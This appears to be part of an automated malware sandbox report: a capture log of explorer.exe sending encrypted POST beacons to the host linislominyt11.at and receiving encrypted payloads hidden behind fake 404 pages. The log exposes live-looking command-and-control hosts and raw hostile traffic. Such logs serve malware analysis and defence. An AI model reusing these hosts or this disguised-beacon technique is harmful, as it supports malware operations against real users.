65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49771	211.53.230.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:11:58.840909004 CEST	10253	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lawpnggnr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: linislominyt11.at
Jun 29, 2022 23:11:58.841022968 CEST	10253	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b9 8a 14 62 cd d6 4f 96 9a c0 4a fc Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOJnMZ6#A&y;e5J4}lm0`z@VF )[xxGw\|(wI+sVmCwH;
Jun 29, 2022 23:11:59.881319046 CEST	10255	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:11:59 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 02 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 41 8f e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c8 85 2c 48 d1 1a 3a 21 7d 4a c1 ed a1 d9 1d 2e 29 4b cb 0f 6e e7 f0 27 20 f3 a4 ad 85 29 1b ee a1 b0 90 98 3e 01 7f 99 d9 8e 77 e1 51 2b 79 23 31 61 94 a3 40 78 15 f5 5a 5f 2f 00 ed a0 f3 9e dd a9 b6 7b c2 e8 65 88 33 8f 7d 86 e7 4a 31 0d 48 42 a7 6c 3f 3c 70 97 7f cc d7 e3 00 3f 23 87 ef 85 10 e7 25 21 e3 dd 1a fd 6b c9 91 19 7b 8e c3 88 35 42 29 17 7a f6 40 ca af a7 74 5b df 22 c5 f7 7d 07 9e 13 3b ce cf c6 00 4f 5d 16 67 18 cf 54 2c 7c 11 60 f6 28 33 f5 ea ca 39 41 87 47 f7 2d aa c8 96 a7 f5 a7 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 6c 33 6c 79 39 0a 8d 8b fc e2 0e 36 3f 6e 30 eb 80 f5 1a 68 9b 4a d8 f9 ae ce 6e 30 78 8a ae 9c e7 05 4c 75 e6 ab f3 57 3b 2a b9 42 fe cc 23 b2 65 0e 31 79 12 97 f7 df f5 ac e7 72 3b 4c 80 d0 02 f9 13 66 11 bb d6 af 31 39 27 d1 69 b7 9f 33 c9 cc 46 d9 78 1b ac af fb d9 55 6d 9f b4 68 90 0e ff 1d 7f 7f 45 40 57 74 7b 39 66 e7 bc 04 28 94 42 40 77 9b c7 9b 94 e7 3d 66 f1 8a 64 b1 1d 30 12 51 9c e1 10 4b 21 6b df 8e 82 d1 e5 e4 5f 5b a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e b4 a6 1e f6 45 11 ee 32 4e 50 a3 50 1d 85 1f d4 5c 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 e2 7d d7 70 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 2e f4 86 64 bd 20 f5 52 28 a7 3d 96 4d db e7 17 3f ac e2 7e 4d b6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e bf 96 ce 8c 1b ea a7 c6 79 c9 ca d4 78 3e 43 43 9c d5 04 62 18 1a 1d f8 40 2a a9 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f 8b e2 09 a8 a5 47 7f d8 79 b8 77 b3 1e d9 80 19 13 28 be 8c f5 48 96 52 b9 61 ed 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 47 b2 52 1c 34 fd f9 6c 57 21 01 7d b4 de 85 96 7f 28 26 27 9d 3f 38 42 56 90 d6 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f 96 a6 b8 b8 d0 c3 fd ea 0e 18 5e 32 90 ec f3 32 42 12 34 16 12 57 0b e9 17 c0 80 e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 a3 19 1f 3f fd 0c 95 8b 5a 2a 01 be b1 fd 58 b3 3c 98 25 1c c0 53 72 5e f5 3e b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 8f 76 62 d1 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 01 28 2b 77 33 c3 00 45 3d 79 24 0d 1e eb 67 f9 7d d8 ef fe cd f0 a8 01 3f 26 58 c5 07 1f ad d6 46 43 7c 20 4b b2 cf dd a9 8c 29 02 3d 89 31 99 a5 13 01 6e 01 2e 10 72 c8 ad f4 ae e4 47 29 fb d8 a7 22 40 42 c1 6f 02 89 cc 05 81 55 0c e3 56 f6 a8 b4 f3 5b 11 8f 41 bd 0a 29 78 87 9b 68 ca 4b c2 7b 28 b0 cf bb 66 56 9a 3c 5c e3 9c 17 6b 18 67 cd d2 f3 bb 75 e0 91 ce e0 ae 08 4b 84 6e 25 2f 74 4d ab 61 98 4b 24 5b cc ba 0f 14 78 c5 8a d3 0e 3a 03 2a 79 2b 0d 8f 3d ef a2 86 89 Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>A%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG,H:!}J.)Kn' )>wQ+y#1a@xZ_/{e3}J1HBl?<p?#%!k{5B)z@t["};O]gT,\|`(39AG-N,%Qa>\|(HkJ{/a]F4l3ly96?n0hJn0xLuW;B#e1yr;Lf19'i3FxUmhE@Wt{9f(B@w=fd0QK!k_[NTUo)2([E2NPP\h),^[}tyPmC}p+z(Fzk7.d R(=M?~Mpvn%.yx>CCb@3%}/Gyw(HRaLEsCGR4lW!}(&'?8BVse%x`80_^22B4WQ =TZ\Z?ZX<%Sr^>m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=(+w3E=y$g}?&XFC\| K)=1n.rG)"@BoUV[A)xhK{(fV<\kguKn%/tMaK$[x:*y+=
Jun 29, 2022 23:11:59.881354094 CEST	10257	IN	Data Raw: f5 11 dc 4f 59 9a 5b 85 5c 42 41 eb 60 fa 12 37 8e dd 28 81 41 78 3d 65 43 32 c0 36 6d c1 db dc d1 29 20 4d 9d 15 ac 25 63 6f 7d 54 5a 84 d0 3e f5 c6 89 99 11 85 1b 9a 32 04 5c 41 13 9c c6 2f a8 f3 d7 e1 1c 70 84 d8 c0 e4 93 c8 f6 47 b2 3c 43 c5 Data Ascii: OY[\BA`7(Ax=eC26m) M%co}TZ>2\A/pG<C4,um\og~$zX9;67=74J!YAPG6/<C1t7RJu!]P\0=Ef1HWA{d5 w[PL,_
Jun 29, 2022 23:12:00.192773104 CEST	10258	IN	Data Raw: df b0 2a f8 c3 0e 9f bc 5d fb ba 8d 6d 19 ff 43 07 a2 76 bf f9 32 0f 43 a8 d0 c8 38 a3 b8 c1 6b 53 cd 2a 1d 2d 60 22 69 4b 9e 36 c6 b9 40 95 da 04 4c b6 8f 37 24 c3 13 d5 27 cc 3b b6 73 32 99 7d 9a da 48 e9 61 fa 68 23 e0 0e 12 35 c6 56 0d f4 a5 Data Ascii: ]mCv2C8kS-`"iK6@L7$';s2}Hah#5VhEH hatw-s="R#.H5zKBNc-;g4L^^^H#n8?*C;]7FMS1`=52rOlPy<?!a)+
Jun 29, 2022 23:12:00.192806959 CEST	10260	IN	Data Raw: 17 e0 1d 7e 10 50 9e 32 ac dc 00 8b 66 3d 15 63 ca 68 69 cc c7 00 e8 30 36 5e c5 77 61 4b d2 d8 3d d7 af 31 7b 12 23 fc 5b 7d 00 4e 4f 16 ba ed d3 b6 e0 1c f1 01 ea 2d 53 8a 4f 9e b7 4c 78 7f be 56 87 e0 41 e8 b4 e9 fd 64 87 7d f6 6a 8d 80 05 5a Data Ascii: ~P2f=chi06^waK=1{#[}NO-SOLxVAd}jZ#D^,p1 O5/G\|&<9UG7RJ64A>k`}yeMdb26lP:W6d.5u\{\@qecSN;~]iyte?
Jun 29, 2022 23:12:00.192823887 CEST	10261	IN	Data Raw: b1 cd a8 38 3a 7b c0 af 25 07 22 80 d3 33 2d d0 33 d7 42 ea 2d 23 68 b8 ee 84 04 75 ae f2 e3 ff 74 8f 97 fe e8 a9 a7 4c 84 32 d1 9b f3 81 c6 16 4b 07 e1 b7 2f de 86 1c b1 75 98 b0 4a f5 d3 e8 06 c4 75 94 0a 5f 9b b5 65 f8 0c 9b d2 6a 98 f1 2f 75 Data Ascii: 8:{%"3-3B-#hutL2K/uJu_ej/uE+M;sTv[t?q.9)jY(T:ETdDUsT`qg(}f QA~d\D$Yn]UwnM!C]d"
Jun 29, 2022 23:12:00.192842007 CEST	10262	IN	Data Raw: f1 68 a0 cf cb fb 4f f7 b2 d5 13 e3 6e 0c ab 12 2c 53 33 35 aa 78 fa bf f1 8e ed 69 b9 71 bb 85 de 0a 23 03 be 20 d9 08 fe 60 54 20 8b 3b 27 07 13 22 9d 47 df 2a 47 11 e0 88 9f 5d 8f 71 14 64 1a f0 41 2d 39 84 e2 ad 7c 88 4b 8c e9 c2 c0 68 42 1a Data Ascii: hOn,S35xiq# `T ;'"GG]qdA-9\|KhBL[rs>@D"pkTBC7X5b!"`~~^I[%[*SS\|nXe}V6DeYiv {7+`fER
Jun 29, 2022 23:12:00.504298925 CEST	10264	IN	Data Raw: db 2a 5c be 81 f9 96 e3 5c 3a 8f 9b 02 34 1b 86 08 1c cd 93 87 d8 5b c5 f8 ab 80 be 9b 03 24 b5 3b d5 7a 2f b6 d9 e3 5b cc 53 74 22 8d 7c 87 1b 27 65 77 1d de f9 37 15 29 87 6a 36 7b b9 bb fd 07 99 cc 31 33 31 09 4e a6 58 61 9f ae 99 24 e1 fa 36 Data Ascii: *\\:4[$;z/[St"\|'ew7)j6{131NXa$6_wnp&+rwO7\:@?6A'4TbKMY+=GcKl4_b~.IKId@20.=am5K1s>e)-]KS<J%Q
Jun 29, 2022 23:12:00.504395962 CEST	10265	IN	Data Raw: a6 2e d2 22 01 cb de 41 b7 0f 93 43 0a 44 21 a6 eb ed e8 e0 df 3d b0 23 f9 a7 b3 78 37 5e f6 b3 fa 1d 52 96 7d 1f 2a b2 f5 08 41 17 4a 52 71 80 b6 11 32 43 ee 14 c5 8f b4 9d 00 e1 f9 d9 e3 ee 26 00 1b cb 18 83 ad 5e 32 b4 52 94 94 f8 d7 4a a7 66 Data Ascii: ."ACD!=#x7^R}AJRq2C&^2RJf[mrp$WD#o6B'mxDe~15%&q N5\u{jt6T(JwU~q!1sER'JvR=z,m6`?wCOk=4Z
Jun 29, 2022 23:12:00.504414082 CEST	10266	IN	Data Raw: 21 a5 b8 d0 76 b1 4f c0 76 0d 2a 83 d3 ed 76 0c 17 5d 8a c2 f9 f2 10 d6 c5 67 d3 5e 21 bb ab 4a 0d fa bb f7 2f 10 cd 84 f2 78 54 ea 2d 18 84 33 04 84 60 40 ed 3e d0 b7 60 ab 3d a9 bc 85 16 1d 35 65 2a a5 4f e8 88 c3 36 3c 69 54 82 71 df 36 d0 44 Data Ascii: !vOvv]g^!J/xT-3`@>`=5eO6<iTq6D[c%E\E>)Sy6A5RnNUoa(Zp*SFi<m)u<d=1Oa.;,);:=#iCg+TM\|ZY-9 1 (#w}7j>J6
Jun 29, 2022 23:12:00.504431009 CEST	10268	IN	Data Raw: 76 a5 33 32 eb 49 2a 43 b3 f6 88 53 71 6a ff 07 05 74 41 c6 28 52 64 21 2f 4a af 6b 73 d7 f6 6a 97 2f 5c 0e e5 ed 11 b1 04 95 d4 4c d0 95 c7 a2 36 26 77 47 22 bb 26 d1 0b ea 41 85 6e ea 5d 4c 90 18 78 3c 64 35 4f 1a 9b cd 21 1f 72 bf bb 62 5f 93 Data Ascii: v32ICSqjtA(Rd!/Jksj/\L6&wG"&An]Lx<d5O!rb_PFvX(%nN#<!]!s9u-\|VB:R7u25I_I:KG% -Vdb??P;Jg\$f>]KBs>:
Jun 29, 2022 23:12:00.504447937 CEST	10269	IN	Data Raw: 56 c8 44 07 1d 0a bf 35 8e 69 31 7f 2c 35 6b c6 dd dd 6f 14 2a 68 57 c5 05 9f e8 85 fe a5 38 6a 66 01 2a 57 67 ea 00 87 db 31 cf 71 34 1d 88 fb 5e 78 a4 44 50 d5 cb 3d 9c 20 88 4f 0f fc 67 b0 f3 a2 ea 6a f1 57 8c c3 01 6f 61 ad 7e 1d 33 5c ac ca Data Ascii: VD5i1,5kohW8jfWg1q4^xDP= OgjWoa~3\@rm8]m4\|#E:3150.OQF3\i\|=[ruxb\|&;mJ\|'r'2*SEmmgJF:vjKRc,wY=kB{l

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49773	211.53.230.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:04.971859932 CEST	11225	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wjlmjplgy.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 280 Host: linislominyt11.at
Jun 29, 2022 23:12:04.971883059 CEST	11226	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 b9 8a 14 62 cc d6 4f 96 e0 d7 58 c0 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bOX#,S-fp,3d+m"17.GOg"\%zU"XOXHxy]<tn}#$PH'x.s8lEVeq*`U#n
Jun 29, 2022 23:12:05.766639948 CEST	11263	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49775	190.117.75.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 29, 2022 23:12:06.584472895 CEST	11306	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://phjdbb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: linislominyt11.at
Jun 29, 2022 23:12:06.584487915 CEST	11306	OUT	Data Raw: 4a 9d fe cf 4c 13 55 22 56 0a 27 52 79 db 53 ca 5e 1c e9 67 8b 6d ab da bc 69 a7 8d 70 f5 d4 98 8a ab fa b1 72 31 ee c6 d0 28 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 be 8a 14 62 cd d6 4f 96 ec af 1a f7 Data Ascii: JLU"V'RyS^gmipr1(jp_S61oJf=B!bObf0 wZ@I08]a[P{7Md3HMDL!O S$HJ@K\|8z=x$``KxW<#&zR]u
Jun 29, 2022 23:12:07.501221895 CEST	11313	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 29 Jun 2022 21:12:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 00 a5 48 46 19 3a 5e 2f b5 6a a5 e3 69 f9 79 20 51 76 d9 01 81 c7 94 29 61 df 50 a2 4f 09 7f e0 50 04 bc 96 6b 21 1b 97 35 10 89 ef cc 0b 1d 2d 97 1c f4 ac 56 58 71 fb ab eb a2 0e 76 80 97 90 90 30 8b 75 53 c8 01 86 e5 fd 89 88 63 6b 55 03 bf 6c 13 d9 88 1c 14 99 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e ce 00 92 72 2b 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e bf f5 ff 78 2d 27 db c4 0d 13 13 9f c9 e1 92 24 18 4f c5 03 b1 c8 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 4a 80 96 be 21 51 61 38 c8 39 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 4b 0b e6 0e 8c eb 7e 71 eb 90 80 1a 10 a5 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 d2 66 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 03 55 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 7b 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 01 93 dd 8e 82 11 e8 e4 1f a4 a3 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 64 c8 f4 1f d4 4c 6b 91 9c cd 04 f1 2c a0 ac 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 8c 0a 07 0c 23 08 43 87 b9 8b 8b e1 92 0e d7 9c 8a c3 e0 2b 4b b1 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 bc ac 43 6f ec 96 74 83 20 f5 52 48 c4 4f 96 4d c9 e7 17 3f 38 e0 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee b1 e4 bd 9e 56 98 c3 a7 75 96 ca d4 5f 39 36 43 9c 15 03 62 18 dc 18 f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 6f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d b9 d1 29 77 e5 3a 02 45 c9 80 26 0d 0e 11 65 f9 57 22 ed fe 85 0a aa 01 5f dc 5a c5 73 e5 af d6 c2 b9 7e 20 d1 48 cd dd 07 76 2b 02 83 73 33 99 69 e9 03 6e e9 d4 12 72 30 57 f6 ae ea bc 2b fb fc 5c 20 40 76 3a 6d 02 cb 37 07 81 05 f7 e1 56 9a 53 b6 f3 d9 ea 8d 41 29 f1 2b 78 2d 60 6a ca f5 39 79 28 64 34 b9 66 b8 61 3e 5c e3 60 15 6b 08 9b cf d2 d5 47 77 e0 a7 32 e2 ae 5a b7 86 6e 41 d3 76 4d d1 9d 9a 4b a8 a7 ce ba ab e8 7a c5 3e 2f 0c 3a c7 d6 7b 2b db 73 3f ef 4e 7a 8b Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShGHF:^/jiy Qv)aPOPk!5-VXqv0uSckUl3Ob>!ZC:>r+uSSQ{~x-'$Oa~i~]DzN,J!Qa89\|(kJk?a]V4l3l)\|K~qJO;yLuVW;r#f1er+Lc1<'iUFHU=h{\|U@Wd{9f(B@w=fd3Dw)pKNTUo)2([>T~pWdLk,[}J#C+Kz(Fzk#Cot RHOM?8~Mpvn%Vu_96Cb@3%}o#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=)w:E&eW"_Zs~ Hv+s3inr0W+\ @v:m7VSA)+x-`j9y(d4fa>\`kGw2ZnAvMKz>/:{+s?Nz
Jun 29, 2022 23:12:07.501255035 CEST	11314	IN	Data Raw: f5 11 21 4d 59 86 a6 87 5c 7c bc e9 60 aa ef 35 8e bf d5 83 41 0e c0 67 43 a6 3d 34 6d 71 26 de d1 e1 dd 4f 9d c1 51 27 63 83 80 56 5a 78 2d 3c f5 ce 77 9b 11 97 e5 98 32 20 a2 43 13 a4 38 2d a8 bb 29 e3 1c 14 7a da c0 90 6d ca f6 cb 4c 3e 43 61 Data Ascii: !MY\\|`5AgC=4mq&OQ'cVZx-<w2 C8-)zmL>Ca`41eM$Z67*=o6H!>OZR;BEgv7+QJ!o]_0#=Ff7IW}z04#ZS"
Jun 29, 2022 23:12:07.742624998 CEST	11316	IN	Data Raw: df d5 2a 9c c3 6b 9f c8 5d 8e ba f4 6d 76 ff 3a 07 d7 76 d5 f9 47 0f 2d a8 d0 c8 52 a3 cd c1 4b 53 ba 2a 78 2d 08 22 0c 4b f4 36 af b9 60 95 a2 04 23 b6 e3 37 45 c3 6b d5 4e cc 58 b6 06 32 ea 7d fb da 2e e9 0e fa 0b 23 e0 0e 64 50 a5 23 6e 95 c8 Data Ascii: k]mv:vG-RKSx-"K6`#7EkNX2}.#dP#nE< atw-S5DREb.!5KB~N_Rg['^+^&T8IOCV87kF"Sj1`hY5GrOlP<?t!)+
Jun 29, 2022 23:12:07.742655039 CEST	11317	IN	Data Raw: 17 84 1d 44 10 6a 9e 51 ac b4 00 ea 66 4f 15 3c ca 1c 69 be c7 61 e8 59 36 2a c5 04 61 77 d2 bb 3d bf af 50 7b 60 23 c2 5b 51 00 2d 4f 7a ba 8c d3 c5 e0 6f f1 21 ea 5e 53 fe 4f fa b7 76 78 45 be 37 87 8c 41 84 b4 86 fd 07 87 1c f6 1e 8d ef 05 28 Data Ascii: DjQfO<iaY6*aw=P{`#[Q-Ozo!^SOvxE7A('^,uOL+&O&Gn"7Rk+6[3k}eM^X2TPlYW6x.j5~u`{\2qIS<N~]ziy+`7
Jun 29, 2022 23:12:07.752203941 CEST	11319	IN	Data Raw: 7b a3 2f 09 1a 4e ef 63 fd d5 2a 6f 47 e1 44 2c 5b 9a 9e 23 0f 20 b3 b0 cb bb 40 e3 6a 21 b0 ca ba 25 1f d7 98 45 db 3a a6 43 db 28 3b ba 2a 3d d5 59 c2 00 3e fe b6 53 37 e2 25 8f 34 70 83 d2 10 f9 1e ca ea 32 e4 b2 96 64 06 f2 37 4a 31 1b 09 96 Data Ascii: {/NcoGD,[# @j!%E:C(;=Y>S7%4p2d7J1bs%gyE:prXGpcfxv)uU/^V{EK\,wjX>S64.F^Xu\;MVSdkj>o4>b6HY
